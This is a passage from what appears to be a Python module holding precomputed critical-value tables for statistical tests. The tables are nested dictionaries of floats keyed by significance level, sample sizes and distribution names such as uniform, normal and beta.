'beta4': 0.11172974205029101}, 300: {'uni': 0.18480486550722386, 'nor': 0.5420471845411214, 'beta1': 0.18425739128256488, 'beta2': 0.49803792491577076, 'beta4': 0.1170983391444022}, 200: {'uni': 0.18410247561395535, 'nor': 0.4225705571887114, 'beta1': 0.1832629600404925, 'beta2': 0.3991187761792379, 'beta4': 0.12520010138008653}, 150: {'uni': 0.1831379504788031, 'nor': 0.35378535669622957, 'beta1': 0.18393102377460066, 'beta2': 0.3533201625197048, 'beta4': 0.1310612284316026}, 100: {'uni': 0.1851477358277497, 'nor': 0.30048949272859776, 'beta1': 0.18722881633512647, 'beta2': 0.2982703912186853, 'beta4': 0.13952949011220495}, 75: {'uni': 0.18420407052491966, 'nor': 0.2747464150268231, 'beta1': 0.1863893010233449, 'beta2': 0.2688833428777913, 'beta4': 0.14483526902687105}, 50: {'uni': 0.18272037174239453, 'nor': 0.24499943819688966, 'beta1': 0.18396142930712786, 'beta2': 0.23860133327254135, 'beta4': 0.15513414164226877}, 30: {'uni': 0.1842369811339266, 'nor': 0.21925965780532913, 'beta1': 0.18267665781136008, 'beta2': 0.21345155008926986, 'beta4': 0.16315465295018947}, 20: {'uni': 0.18596055862126862, 'nor': 0.20895267177449817, 'beta1': 0.18242691039042175, 'beta2': 0.20282499131835807, 'beta4': 0.17122285192412554}, 10: {'uni': 0.18557308492410754, 'nor': 0.19918179801171515, 'beta1': 0.1840271099140626, 'beta2': 0.1938309824025229, 'beta4': 0.1767417121054671}}, 75: {1000: {'uni': 0.20711268462000337, 'nor': 1.7730177547589154, 'beta1': 0.1869960981370644, 'beta2': 1.2726475334757859, 'beta4': 0.100342571351767}, 750: {'uni': 0.20243866747068975, 'nor': 1.3991570539695792, 'beta1': 0.18513552603442698, 'beta2': 1.0017005109802415, 'beta4': 0.10276510802172498}, 500: {'uni': 0.1965709888981754, 'nor': 0.9742389984198174, 'beta1': 0.18355281840357834, 'beta2': 0.80284673792362, 'beta4': 0.10644357393348948}, 400: {'uni': 0.19146567109436297, 'nor': 0.841354076993409, 'beta1': 0.1855585099111213, 'beta2': 0.6565346919964216, 'beta4': 0.10781413077990055}, 300: {'uni': 0.18767169125550484, 'nor': 0.6612307292158803, 'beta1': 0.18405456456460575, 'beta2': 0.575015165674034, 'beta4': 0.11340006488072128}, 200: {'uni': 0.18875684035705986, 'nor': 0.5001358507311437, 'beta1': 0.18514163593432517, 'beta2': 0.44825655120643315, 'beta4': 0.11771535031911876}, 150: {'uni': 0.18273849384781432, 'nor': 0.4231160741504525, 'beta1': 0.18561439219437587, 'beta2': 0.38137814444752033, 'beta4': 0.1262731157515569}, 100: {'uni': 0.18225839061196816, 'nor': 0.338619585958276, 'beta1': 0.18186852876160955, 'beta2': 0.31617844744686563, 'beta4': 0.13374500648884993}, 75: {'uni': 0.18299158238453536, 'nor': 0.29961345440771225, 'beta1': 0.18696060459585148, 'beta2': 0.28468953064421093, 'beta4': 0.13946308848404163}, 50: {'uni': 0.1832723234116953, 'nor': 0.26283989390926227, 'beta1': 0.18506600379584687, 'beta2': 0.24750497454599002, 'beta4': 0.1481327869764839}, 30: {'uni': 0.18191405722869375, 'nor': 0.23431812960162796, 'beta1': 0.18521277623339458, 'beta2': 0.22079273390393087, 'beta4': 0.1592348611407742}, 20: {'uni': 0.18473341697360826, 'nor': 0.2195649379961785, 'beta1': 0.18563835105682194, 'beta2': 0.20770543157127955, 'beta4': 0.16479815778328769}, 10: {'uni': 0.18506924782584366, 'nor': 0.20570651820563146, 'beta1': 0.1866075791349083, 'beta2': 0.19341244195911075, 'beta4': 0.17748207906313238}}, 50: {1000: {'uni': 0.24103040620532545, 'nor': 2.627239706679091, 'beta1': 0.1874509583911653, 'beta2': 1.5677617919882278, 'beta4': 0.09789020561766841}, 750: {'uni': 0.22444541668429782, 'nor': 2.015315850284036, 'beta1': 0.18823153541894252, 'beta2': 1.2133199248338002, 'beta4': 0.09979798541763203}, 500: {'uni': 0.2104911731606476, 'nor': 1.38982671099465, 'beta1': 0.18746213379969717, 'beta2': 0.9366731794445591, 'beta4': 0.10269358339160997}, 400: {'uni': 0.20531070615513639, 'nor': 1.148301345520581, 'beta1': 0.18554521120654618, 'beta2': 0.7860055480947616, 'beta4': 0.10501089981968535}, 300: {'uni': 0.19934989819705742, 'nor': 0.8993661590744696, 'beta1': 0.18318293203211186, 'beta2': 0.6644979497197328, 'beta4': 0.10756412793208994}, 200: {'uni': 0.1921846611195358, 'nor': 0.6606908760158289, 'beta1': 0.18423109397748733, 'beta2': 0.5140542101443047, 'beta4': 0.11311740549405308}, 150: {'uni': 0.18961104398723572, 'nor': 0.5431369687165466, 'beta1': 0.18627983842993445, 'beta2': 0.43577804383019, 'beta4': 0.11788729433993039}, 100: {'uni': 0.18510814836165915, 'nor': 0.43114936330892584, 'beta1': 0.18448355982106907, 'beta2': 0.35642356479702164, 'beta4': 0.12452405723524114}, 75: {'uni': 0.18347411444813314, 'nor': 0.3665250370541888, 'beta1': 0.18489904225754517, 'beta2': 0.3207238999009413, 'beta4': 0.13094014210262298}, 50: {'uni': 0.18152653854784864, 'nor': 0.3021554777109189, 'beta1': 0.1855837950623708, 'beta2': 0.26894400195384355, 'beta4': 0.13977255851048295}, 30: {'uni': 0.17944329155456532, 'nor': 0.25589954702925916, 'beta1': 0.18177564577800395, 'beta2': 0.2259481098108176, 'beta4': 0.15087949281315094}, 20: {'uni': 0.18285848202810834, 'nor': 0.23495619641475976, 'beta1': 0.18418902422158248, 'beta2': 0.21053639359909057, 'beta4': 0.16289925871937844}, 10: {'uni': 0.18270695707991996, 'nor': 0.2096678137972554, 'beta1': 0.18653089016810714, 'beta2': 0.19684068664753132, 'beta4': 0.1704553669593008}}, 30: {1000: {'uni': 0.35059610653095774, 'nor': 4.278063195318857, 'beta1': 0.20388816838421095, 'beta2': 1.930305431945286, 'beta4': 0.09798289618718463}, 750: {'uni': 0.30507003691713097, 'nor': 3.21820776280224, 'beta1': 0.19622584473615895, 'beta2': 1.5979743998440465, 'beta4': 0.09714954501361119}, 500: {'uni': 0.26008473519802, 'nor': 2.2497384827957188, 'beta1': 0.1924900551191556, 'beta2': 1.1740862526243834, 'beta4': 0.09932387680106194}, 400: {'uni': 0.246066913448192, 'nor': 1.8039541962199412, 'beta1': 0.19029154767051165, 'beta2': 0.9792810501146351, 'beta4': 0.10044308660904461}, 300: {'uni': 0.22837881683581426, 'nor': 1.3951249872303733, 'beta1': 0.18464244517695091, 'beta2': 0.7923064688616753, 'beta4': 0.10371786223959582}, 200: {'uni': 0.2096008117213653, 'nor': 0.9894495628252942, 'beta1': 0.18661453750912715, 'beta2': 0.6265848402430967, 'beta4': 0.1058001385440015}, 150: {'uni': 0.2047520758256172, 'nor': 0.7821984888895062, 'beta1': 0.18759321457289763, 'beta2': 0.5198694245808844, 'beta4': 0.10807280355877953}, 100: {'uni': 0.19121268890754203, 'nor': 0.5928634651322495, 'beta1': 0.1840954961076464, 'beta2': 0.4184841874770464, 'beta4': 0.11527272387605526}, 75: {'uni': 0.1912910963358721, 'nor': 0.48913096110692394, 'beta1': 0.18215208706652994, 'beta2': 0.3547928099573867, 'beta4': 0.11922051901033888}, 50: {'uni': 0.18440606056882947, 'nor': 0.39561565247457786, 'beta1': 0.18223908669314237, 'beta2': 0.30220319429490433, 'beta4': 0.12812440980731452}, 30: {'uni': 0.18222407004959135, 'nor': 0.30418682264129604, 'beta1': 0.18679408185790608, 'beta2': 0.2491166973284583, 'beta4': 0.13942212483224153}, 20: {'uni': 0.18097656955489333, 'nor': 0.26515944288371085, 'beta1': 0.18367253348921583, 'beta2': 0.22596040797528127, 'beta4': 0.14749125985662656}, 10: {'uni': 0.1812785781213858, 'nor': 0.22411839439365913, 'beta1': 0.18377973985540141, 'beta2': 0.20261486000614173, 'beta4': 0.16383998193988902}}, 20: {1000: {'uni': 0.557588775025206, 'nor': 6.23263722804059, 'beta1': 0.24824273547433398, 'beta2': 2.5916665978624773, 'beta4': 0.09556521996049769}, 750: {'uni': 0.45544548344679703, 'nor': 4.960783858737055, 'beta1': 0.2315334208360766, 'beta2': 2.116834484867373, 'beta4': 0.09605379123194507}, 500: {'uni': 0.36047636166919345, 'nor': 3.2882260206430223, 'beta1': 0.21162692388832308, 'beta2': 1.4976707301720542, 'beta4': 0.09610105856086308}, 400: {'uni': 0.3196200397941912, 'nor': 2.6396332773464715, 'beta1': 0.2046928363598519, 'beta2': 1.265541898484928, 'beta4': 0.09827851131902052}, 300: {'uni': 0.28281307995759886, 'nor': 2.011907686223302, 'beta1': 0.1998415817930172, 'beta2': 0.9828568650064285, 'beta4': 0.09994987623415}, 200: {'uni': 0.24538969043580305, 'nor': 1.407599774702493, 'beta1': 0.19433833988424531, 'beta2': 0.7602852314379016, 'beta4': 0.10173240503051327}, 150: {'uni': 0.22623111278829658, 'nor': 1.1172309316240872, 'beta1': 0.1893663211990802, 'beta2': 0.6112263086634806, 'beta4': 0.10524857569135072}, 100: {'uni': 0.21033799716194235, 'nor': 0.7960728357807297, 'beta1': 0.18863382329214456, 'beta2': 0.48583796438531557, 'beta4': 0.10944951155940488}, 75: {'uni': 0.20239363660320567, 'nor': 0.653354873083433, 'beta1': 0.18465183242228214, 'beta2': 0.40852522362409677, 'beta4': 0.11117099248230677}, 50: {'uni': 0.19241628654888826, 'nor': 0.49230178420719256, 'beta1': 0.18370029558550202, 'beta2': 0.3315673506671088, 'beta4': 0.12034526923407932}, 30: {'uni': 0.1838470566331029, 'nor': 0.3690970245177923, 'beta1': 0.18158906884639572, 'beta2': 0.2703572480667707, 'beta4': 0.1305763969399149}, 20: {'uni': 0.18439013813515145, 'nor': 0.3113933846355926, 'beta1': 0.18171723618996996, 'beta2': 0.2369287296609353, 'beta4': 0.13967615415157159}, 10: {'uni': 0.18179638952526822, 'nor': 0.24629649064457582, 'beta1': 0.18144757035417675, 'beta2': 0.20971828838261652, 'beta4': 0.15608505701021883}}, 10: {1000: {'uni': 1.630169780842474, 'nor': 13.623294187847977, 'beta1': 0.6537074318170204, 'beta2': 4.838110857510732, 'beta4': 0.09413800337231777}, 750: {'uni': 1.2606778724851384, 'nor': 9.898087519223337, 'beta1': 0.5360828395709647, 'beta2': 3.755077850787192, 'beta4': 0.09609909813587005}, 500: {'uni': 0.866979270399114, 'nor': 6.86185146993719, 'beta1': 0.40719109616766064, 'beta2': 2.486938148944695, 'beta4': 0.09657207917263508}, 400: {'uni': 0.7234311603303463, 'nor': 5.533257506558093, 'beta1': 0.35555181458287194, 'beta2': 2.0684678266516845, 'beta4': 0.09575639679537408}, 300: {'uni': 0.5740562572746054, 'nor': 4.13961208846063, 'beta1': 0.30947004057833194, 'beta2': 1.5733033072118243, 'beta4': 0.09716579757282962}, 200: {'uni': 0.43012982000413774, 'nor': 2.806431923980102, 'beta1': 0.25923513854877184, 'beta2': 1.1217059286617272, 'beta4': 0.09769834869400658}, 150: {'uni': 0.3660568810176042, 'nor': 2.165907302955124, 'beta1': 0.2367881673186339, 'beta2': 0.8900796906245184, 'beta4': 0.0986555241279555}, 100: {'uni': 0.2963521456078561, 'nor': 1.4423314673071785, 'beta1': 0.21603240846651683, 'beta2': 0.6539876622911982, 'beta4': 0.101203675655721}, 75: {'uni': 0.26296739530637186, 'nor': 1.1761992322784602, 'beta1': 0.20484690859183285, 'beta2': 0.5351984389092316, 'beta4': 0.10492040345498926}, 50: {'uni': 0.22994652917703381, 'nor': 0.8431170822039252, 'beta1': 0.19350639779310821, 'beta2': 0.43102251731484564, 'beta4': 0.10827771561061793}, 30: {'uni': 0.2033383416551495, 'nor': 0.5806932221078154, 'beta1': 0.18502168086844142, 'beta2': 0.3218406334608748, 'beta4': 0.11399907323057486}, 20: {'uni': 0.1923057509260784, 'nor': 0.44699498766501866, 'beta1': 0.18199021346561728, 'beta2': 0.26969550832768435, 'beta4': 0.12249371308737968}, 10: {'uni': 0.17887078242976767, 'nor': 0.31761146933960366, 'beta1': 0.1766444136945467, 'beta2': 0.21765707501491735, 'beta4': 0.13832752334780735}}}} # noqa: E501, E231 crit_dist_upd_cm = {0.05: {1000: {1000: {'uni': 0.013833831976126072, 'beta1': 0.0003329885568229087, 'beta2': 0.22974622882027226, 'beta4': [0.0018908295164874612, 1.0697194182314242]}, 750: {'uni': 0.016990917368002133, 'beta1': 0.0006113165919820284, 'beta2': 0.23684284676662615, 'beta4': [0.002770944333718528, 1.0556667242656854]}, 500: {'uni': 0.023600774750904736, 'beta1': 0.0009199173841866722, 'beta2': 0.2753909552830473, 'beta4': [0.0037082814337906045, 1.0482794905722563]}, 400: {'uni': 0.02640029217064558, 'beta1': 0.0013622133600444137, 'beta2': 0.27352545783196475, 'beta4': [0.005913349923484303, 1.0456546892584218]}, 300: {'uni': 0.04006129826220925, 'beta1': 0.002720238345700929, 'beta2': 0.292583092890596, 'beta4': [0.007281293542356923, 1.0400206581224385]}, 200: {'uni': 0.07032909758220027, 'beta1': 0.005970864163422045, 'beta2': 0.34167794009457075, 'beta4': [0.009494471525280058, 1.0349849380276617]}, 150: {'uni': 0.1012642936451668, 'beta1': 0.013652756645306451, 'beta2': 0.39479224192835694, 'beta4': [0.01194023988657095, 1.0281722066537058]}, 100: {'uni': 0.13313776389084864, 'beta1': 0.022784367464349673, 'beta2': 0.41847533458373803, 'beta4': [0.020038218784910505, 1.0236478943934566]}, 75: {'uni': 0.14039046466276972, 'beta1': 0.04097056181025277, 'beta2': 0.46162284607879156, 'beta4': [0.0243947240305133, 1.0222016752862486]}, 50: {'uni': 0.22621965744544004, 'beta1': 0.0737194908849337, 'beta2': 0.517884604992627, 'beta4': [0.03269564227543516, 1.0182370445806526]}, 30: {'uni': 0.3065027272179305, 'beta1': 0.19186519999119622, 'beta2': 0.6071682127005255, 'beta4': [0.05374474739717058, 1.0137406936599733]}, 20: {'uni': 0.4579999299085743, 'beta1': 0.26347326935911947, 'beta2': 0.6609864081120751, 'beta4': [0.07348286747648815, 1.0145791780700397]}, 10: {'uni': 0.7093161375782928, 'beta1': 0.5119588745735099, 'beta2': 0.8207303938633076, 'beta4': [0.12023859377021034, 1.0100370019812506]}}, 750: {1000: {'uni': 0.01647447307790564, 'beta1': 0.0005070015607912077, 'beta2': 0.2629768360729676, 'beta4': [0.0033495902420869147, 1.0812966928373942]}, 750: {'uni': 0.018829802981785562, 'beta1': 0.0004891759389985897, 'beta2': 0.264938253953924, 'beta4': [0.0031531587883013427, 1.0792673641589363]}, 500: {'uni': 0.024080037100477052, 'beta1': 0.0012244937314284828, 'beta2': 0.24359686255819019, 'beta4': [0.004206903547084224, 1.076095067847491]}, 400: {'uni': 0.027584807407406455, 'beta1': 0.0016752340265126897, 'beta2': 0.26260070623151555, 'beta4': [0.005580712827419352, 1.060010603580021]}, 300: {'uni': 0.05146390929515149, 'beta1': 0.0026509847812920093, 'beta2': 0.303092230265923, 'beta4': [0.006365207456983704, 1.0541922110575421]}, 200: {'uni': 0.059327890449950973, 'beta1': 0.006979003319027128, 'beta2': 0.31285174277571925, 'beta4': [0.010945442489642966, 1.0474108448665012]}, 150: {'uni': 0.07603679549416355, 'beta1': 0.013496169428675047, 'beta2': 0.3555003501031682, 'beta4': [0.012749501962998663, 1.0375483550076372]}, 100: {'uni': 0.10561248103143273, 'beta1': 0.03187318794369734, 'beta2': 0.417146268097644, 'beta4': [0.020713494340326415, 1.0335080956133786]}, 75: {'uni': 0.14405962731563504, 'beta1': 0.043732800833889925, 'beta2': 0.4610806633425333, 'beta4': [0.02597652100879122, 1.0295014609635151]}, 50: {'uni': 0.20966063546789582, 'beta1': 0.07890839084581142, 'beta2': 0.5102418622987501, 'beta4': [0.043904941213022464, 1.0248461468788301]}, 30: {'uni': 0.38962310099779707, 'beta1': 0.1915135222435897, 'beta2': 0.6101573464223917, 'beta4': [0.06118300251929863, 1.0194659530900299]}, 20: {'uni': 0.428272065096665, 'beta1': 0.2518149043542126, 'beta2': 0.6947446253738557, 'beta4': [0.07492008381074046, 1.017655002271037]}, 10: {'uni': 0.7045396300117182, 'beta1': 0.5239027718500835, 'beta2': 0.8357669029306978, 'beta4': [0.11572334717911056, 1.0123883559270712]}}, 500: {1000: {'uni': 0.027224573572945946, 'beta1': 0.0013397428793559755, 'beta2': 0.3001985870543363, 'beta4': [0.004003070786742122, 1.1172596869640967]}, 750: {'uni': 0.028043993584209094, 'beta1': 0.0010541824335439582, 'beta2': 0.2823382920552223, 'beta4': [0.0036581315313476436, 1.1034623133987689]}, 500: {'uni': 0.02471763430703555, 'beta1': 0.0012248560308923057, 'beta2': 0.3307660083666149, 'beta4': [0.003302816728501824, 1.0934914146805519]}, 400: {'uni': 0.03236939986555113, 'beta1': 0.001492188135934995, 'beta2': 0.2834271159680854, 'beta4': [0.005281401022483379, 1.0858354786705675]}, 300: {'uni': 0.03914763722813296, 'beta1': 0.003120837500885247, 'beta2': 0.3326263681825811, 'beta4': [0.0059725430409256035, 1.080984369602341]}, 200: {'uni': 0.0674042868008787, 'beta1': 0.006767448043648924, 'beta2': 0.3349053851571213, 'beta4': [0.011969283802141791, 1.064357245786229]}, 150: {'uni': 0.082100927216335, 'beta1': 0.015091611739326043, 'beta2': 0.36047891136615184, 'beta4': [0.012143500193535273, 1.0603960329700548]}, 100: {'uni': 0.11090915635366168, 'beta1': 0.027855094159398915, 'beta2': 0.3960346148033574, 'beta4': [0.019873043933564375, 1.046442261406773]}, 75: {'uni': 0.13673584694945418, 'beta1': 0.04335726498923612, 'beta2': 0.46353116897047625, 'beta4': [0.022393899130873997, 1.0454004320894406]}, 50: {'uni': 0.26894500541594535, 'beta1': 0.07457662656723034, 'beta2': 0.5208863650222786, 'beta4': [0.036275561342054785, 1.0352702855461442]}, 30: {'uni': 0.3716936672337271, 'beta1': 0.17149387158728827, 'beta2': 0.6186004901982012, 'beta4': [0.06131349205497524, 1.0286449977262795]}, 20: {'uni': 0.467854736258422, 'beta1': 0.2513799996100335, 'beta2': 0.7006936802929652, 'beta4': [0.08626269634774561, 1.0230576102360847]}, 10: {'uni': 0.7362089605117925, 'beta1': 0.56086440263617, 'beta2': 0.8099518386992302, 'beta4': [0.11677030825502484, 1.0190838199658914]}}, 400: {1000: {'uni': 0.025284520784155894, 'beta1': 0.0016403734885094123, 'beta2': 0.31576478638382965, 'beta4': [0.004799521441428401, 1.149091195956356]}, 750: {'uni': 0.027799931928113246, 'beta1': 0.0015799682859719154, 'beta2': 0.3713849781520663, 'beta4': [0.004689070159467552, 1.124317344925337]}, 500: {'uni': 0.027483125208737986, 'beta1': 0.0024269483783257067, 'beta2': 0.27701755632147346, 'beta4': [0.004591320892501386, 1.1297845739588293]}, 400: {'uni': 0.03084627816775358, 'beta1': 0.0023979691180455814, 'beta2': 0.2730921713151016, 'beta4': [0.004974023608712, 1.106968985947837]}, 300: {'uni': 0.04342497872614666, 'beta1': 0.005122316708978925, 'beta2': 0.30396801422598557, 'beta4': [0.005941217951056899, 1.0999705260170498]}, 200: {'uni': 0.06731729987144204, 'beta1': 0.006636474398841804, 'beta2': 0.32885187834473645, 'beta4': [0.00949566072118334, 1.0888691708222482]}, 150: {'uni': 0.08264251761514971, 'beta1': 0.010132361123248543, 'beta2': 0.36101864325194, 'beta4': [0.012446278508938115, 1.0763280315015658]}, 100: {'uni': 0.10637172944422692, 'beta1': 0.01878644943776261, 'beta2': 0.4093008044094355, 'beta4': [0.020820333377676758, 1.06113616348469]}, 75: {'uni': 0.13795394349254128, 'beta1': 0.038995240660645046, 'beta2': 0.4405290225383519, 'beta4': [0.02473764963709022, 1.0527356149901959]}, 50: {'uni': 0.2406132500211715, 'beta1': 0.0700599044565557, 'beta2': 0.5265650730092543, 'beta4': [0.0339903732354553, 1.0462654860073552]}, 30: {'uni': 0.3173806374952389, 'beta1': 0.18444265554793618, 'beta2': 0.6325883170629072, 'beta4': [0.06610429250040999, 1.0355934184804019]}, 20: {'uni': 0.423548511058078, 'beta1': 0.25465448942736657, 'beta2': 0.6725333843878142, 'beta4': [0.07438553906653562, 1.0311030590947072]}, 10: {'uni': 0.6688467656594845, 'beta1': 0.5112523271928556, 'beta2': 0.8293005648094274, 'beta4': [0.1197769525104218, 1.0249310486188403]}}, 300: {1000: {'uni': 0.03646544382648058, 'beta1': 0.003251490535066205, 'beta2': 0.3201872293239301, 'beta4': [0.006951397024167792, 1.193926518402875]}, 750: {'uni': 0.03648594176728415, 'beta1': 0.002636200271072265, 'beta2': 0.3174843999565502, 'beta4': [0.006473086994037532, 1.183601205377894]}, 500: {'uni': 0.04072652314645194, 'beta1': 0.002558944110032064, 'beta2': 0.3251984717738673, 'beta4': [0.007789765735562143, 1.1835748123967167]}, 400: {'uni': 0.0393383633533453, 'beta1': 0.003847932927579061, 'beta2': 0.2860643127801613, 'beta4': [0.0062386354375463336, 1.1654789898222022]}, 300: {'uni': 0.04397095573137874, 'beta1': 0.0030280024317967777, 'beta2': 0.3789180859983394, 'beta4': [0.009249413107330818, 1.127841007910807]}, 200: {'uni': 0.06792667259937368, 'beta1': 0.005983841955930665, 'beta2': 0.3413062807433401, 'beta4': [0.009552799854332017, 1.0999288094012698]}, 150: {'uni': 0.0869747164851829, 'beta1': 0.012290799030814667, 'beta2': 0.3649645571564334, 'beta4': [0.014748639591924993, 1.0996203885277052]}, 100: {'uni': 0.11636318979764056, 'beta1': 0.02817460092180575, 'beta2': 0.4096280985600957, 'beta4': [0.01922673614387383, 1.0813822423223525]}, 75: {'uni': 0.15706280301874442, 'beta1': 0.039130351614999406, 'beta2': 0.42263093869109436, 'beta4': [0.024857576975933136, 1.0690602414012946]}, 50: {'uni': 0.28048873616461506, 'beta1': 0.06810514058491184, 'beta2': 0.5234093698507445, 'beta4': [0.037664123441808646, 1.0630363349497096]}, 30: {'uni': 0.3213033129924418, 'beta1': 0.16748462352883312, 'beta2': 0.6323735870294098, 'beta4': [0.05278897520198084, 1.0554917161294344]}, 20: {'uni': 0.5291733323766079, 'beta1': 0.2881578438762836, 'beta2': 0.7065202369109715, 'beta4': [0.07581480967034805, 1.043877964407442]}, 10: {'uni': 0.6636936363784581, 'beta1': 0.5173161477349097, 'beta2': 0.8275178393484293, 'beta4': [0.11949087211913659, 1.030446523297133]}}, 200: {1000: {'uni': 0.056736728276972896, 'beta1': 0.006839089656716795, 'beta2': 0.3272153807911214, 'beta4': [0.008455904960003245, 1.248625041859922]}, 750: {'uni': 0.05163279737714969, 'beta1': 0.010730487701533719, 'beta2': 0.3635515979264522, 'beta4': [0.007813754917837435, 1.2349194372374692]}, 500: {'uni': 0.05338620611203703, 'beta1': 0.006038477096334755, 'beta2': 0.3359196893924308, 'beta4': [0.011917568033129048, 1.2117966329062095]}, 400: {'uni': 0.058860799267621965, 'beta1': 0.0063165150330285426, 'beta2': 0.3789779915309377, 'beta4': [0.009755269735322647, 1.1804431185986555]}, 300: {'uni': 0.07153008954664851, 'beta1': 0.011047298709712905, 'beta2': 0.42900186641443894, 'beta4': [0.009584723093740515, 1.1880360664225362]}, 200: {'uni': 0.06344836733337247, 'beta1': 0.00781338886239747, 'beta2': 0.38781497493064176, 'beta4': [0.009797652441966509, 1.1638617512261697]}, 150: {'uni': 0.07459560420290043, 'beta1': 0.014056540580835258, 'beta2': 0.39046599800764625, 'beta4': [0.01168897465145889, 1.143775876304623]}, 100: {'uni': 0.11462970160562651, 'beta1': 0.025847066135830016, 'beta2': 0.39498442294942704, 'beta4': [0.01690940914502444, 1.1220874640395795]}, 75: {'uni': 0.14759832305943538, 'beta1': 0.047967300368844945, 'beta2': 0.43098417504532077, 'beta4': [0.031171793994368147, 1.1060770360134216]}, 50: {'uni': 0.23542071804173764, 'beta1': 0.09719199816075956, 'beta2': 0.5013506677050935, 'beta4': [0.03824146010789057, 1.1001663175850784]}, 30: {'uni': 0.3096592063935794, 'beta1': 0.15176694546522967, 'beta2': 0.5802936759286862, 'beta4': [0.0520104795571762, 1.0790703149850533]}, 20: {'uni': 0.45262915303228857, 'beta1': 0.261027201183725, 'beta2': 0.6364867032723682, 'beta4': [0.07130296373607303, 1.0621513268964007]}, 10: {'uni': 0.7295542697541142, 'beta1': 0.5124743313750191, 'beta2': 0.8144547112453855, 'beta4': [0.12479877669495536, 1.0515776201768678]}}, 150: {1000: {'uni': 0.07909618379520475, 'beta1': 0.009086321462188735, 'beta2': 0.4106450929510854, 'beta4': [0.012610658427334429, 1.2924313816625217]}, 750: {'uni': 0.07407325699561099, 'beta1': 0.014177338709786392, 'beta2': 0.4420930391617977, 'beta4': [0.014296507845962717, 1.3032443798682725]}, 500: {'uni': 0.07511369957824804, 'beta1': 0.01459171218041179, 'beta2': 0.47288468448977605, 'beta4': [0.013729395246877836, 1.251141347455903]}, 400: {'uni': 0.06944188808191638, 'beta1': 0.011176061659909423, 'beta2': 0.4035923111579738, 'beta4': [0.0125839858594099, 1.252919423776858]}, 300: {'uni': 0.06438335011755501, 'beta1': 0.016931344535076297, 'beta2': 0.4162306964573891, 'beta4': [0.010744824447481266, 1.222923097027982]}, 200: {'uni': 0.083964124476108, 'beta1': 0.014056137289547922, 'beta2': 0.4075437900930126, 'beta4': [0.013111563370934956, 1.2255955330645523]}, 150: {'uni': 0.07981799506756729, 'beta1': 0.01064409388613912, 'beta2': 0.3894789166335232, 'beta4': [0.023018732181305603, 1.2038155048533767]}, 100: {'uni': 0.14488849486361138, 'beta1': 0.020965041261413544, 'beta2': 0.5435612537940565, 'beta4': [0.01967025175597771, 1.1751658929630506]}, 75: {'uni': 0.12897242715258447, 'beta1': 0.05785618914959902, 'beta2': 0.4826347696087146, 'beta4': [0.02126529804324562, 1.1451923798322048]}, 50: {'uni': 0.21140150701110877, 'beta1': 0.10005146878076632, 'beta2': 0.5218040110926477, 'beta4': [0.036922327127357234, 1.1380283919405332]}, 30: {'uni': 0.31984297162744296, 'beta1': 0.1673346729784614, 'beta2': 0.5899636395543545, 'beta4': [0.056428456138648345, 1.0993767784566557]}, 20: {'uni': 0.4803508464303079, 'beta1': 0.2591276485033553, 'beta2': 0.6504322077039979, 'beta4': [0.07569043282680564, 1.0812645201801898]}, 10: {'uni': 0.6662991959861223, 'beta1': 0.5623584413477307, 'beta2': 0.7961858685655749, 'beta4': [0.11637566937767005, 1.0580619720265005]}}, 100: {1000: {'uni': 0.14063611585827807, 'beta1': 0.031228653444278272, 'beta2': 0.47970305740153707, 'beta4': [0.02119406846518135, 1.4093426070113058]}, 750: {'uni': 0.11080279866278557, 'beta1': 0.024578272682976215, 'beta2': 0.4781884547127654, 'beta4': [0.017108452919179756, 1.41979885240354]}, 500: {'uni': 0.11770170054806148, 'beta1': 0.022738881695332867, 'beta2': 0.5844182960912642, 'beta4': [0.019660423184423573, 1.4047538191133986]}, 400: {'uni': 0.09926981160838831, 'beta1': 0.02219582292278474, 'beta2': 0.671019314550252, 'beta4': [0.02316966058932741, 1.3998233294106437]}, 300: {'uni': 0.11165748604091662, 'beta1': 0.029124281889602723, 'beta2': 0.4721222552275545, 'beta4': [0.021756365768324605, 1.3290924202376428]}, 200: {'uni': 0.12905012210969638, 'beta1': 0.02094718575899271, 'beta2': 0.47904864964482474, 'beta4': [0.022053897791131153, 1.2965456498187415]}, 150: {'uni': 0.11436257112395143, 'beta1': 0.027233016603507326, 'beta2': 0.505711169362763, 'beta4': [0.018463812410358174, 1.296183093117874]}, 100: {'uni': 0.1207577987530685, 'beta1': 0.03071522925704068, 'beta2': 0.477800710856348, 'beta4': [0.024519964931620897, 1.275243559696543]}, 75: {'uni': 0.19331469072257756, 'beta1': 0.02696019246477948, 'beta2': 0.5161607373371395, 'beta4': [0.026456646897275147, 1.2178304835805245]}, 50: {'uni': 0.2191415739843373, 'beta1': 0.06910385300920173, 'beta2': 0.5324442515990134, 'beta4': [0.03663912620751329, 1.1950430051511647]}, 30: {'uni': 0.27736623923689757, 'beta1': 0.15478071905259447, 'beta2': 0.6146633897712037, 'beta4': [0.05959673655496849, 1.1665156813618243]}, 20: {'uni': 0.40196115583372394, 'beta1': 0.2862799604210803, 'beta2': 0.6607899949419531, 'beta4': [0.0746458492423967, 1.1291374980340438]}, 10: {'uni': 0.6470479117720613, 'beta1': 0.5267194757051761, 'beta2': 0.8293978979725132, 'beta4': [0.13187127875511187, 1.1065295182068606]}}, 75: {1000: {'uni': 0.1515786966922324, 'beta1': 0.04592846518156684, 'beta2': 0.49675994638091236, 'beta4': [0.025848246678429294, 1.4979277518131913]}, 750: {'uni': 0.1359250794409579, 'beta1': 0.06269301788506419, 'beta2': 0.5300280831252744, 'beta4': [0.03172730420284062, 1.5582769770959521]}, 500: {'uni': 0.1489293835461733, 'beta1': 0.03758607283821415, 'beta2': 0.5591068809725539, 'beta4': [0.0290073547842622, 1.5015503418584653]}, 400: {'uni': 0.1620614533244523, 'beta1': 0.05170070240507436, 'beta2': 0.5319186060243111, 'beta4': [0.03172398797428782, 1.493476350917158]}, 300: {'uni': 0.17057859098038355, 'beta1': 0.04058586637229189, 'beta2': 0.6618855931935482, 'beta4': [0.023707512357693854, 1.5208629132217224]}, 200: {'uni': 0.16919617696560252, 'beta1': 0.044511575340384274, 'beta2': 0.5604502346566455, 'beta4': [0.023421519588066396, 1.376070096376646]}, 150: {'uni': 0.16038601440082725, 'beta1': 0.04466704954413228, 'beta2': 0.5364478230042707, 'beta4': [0.02269054266192888, 1.3659137244555777]}, 100: {'uni': 0.16697780890015043, 'beta1': 0.05780266344429386, 'beta2': 0.6598988497330642, 'beta4': [0.02269683312496209, 1.3064106529050417]}, 75: {'uni': 0.18936779659288844, 'beta1': 0.0528588404071561, 'beta2': 0.5024015892218546, 'beta4': [0.02722661600125422, 1.2880066034829047]}, 50: {'uni': 0.23900875770128244, 'beta1': 0.08314836009999102, 'beta2': 0.7316807298861019, 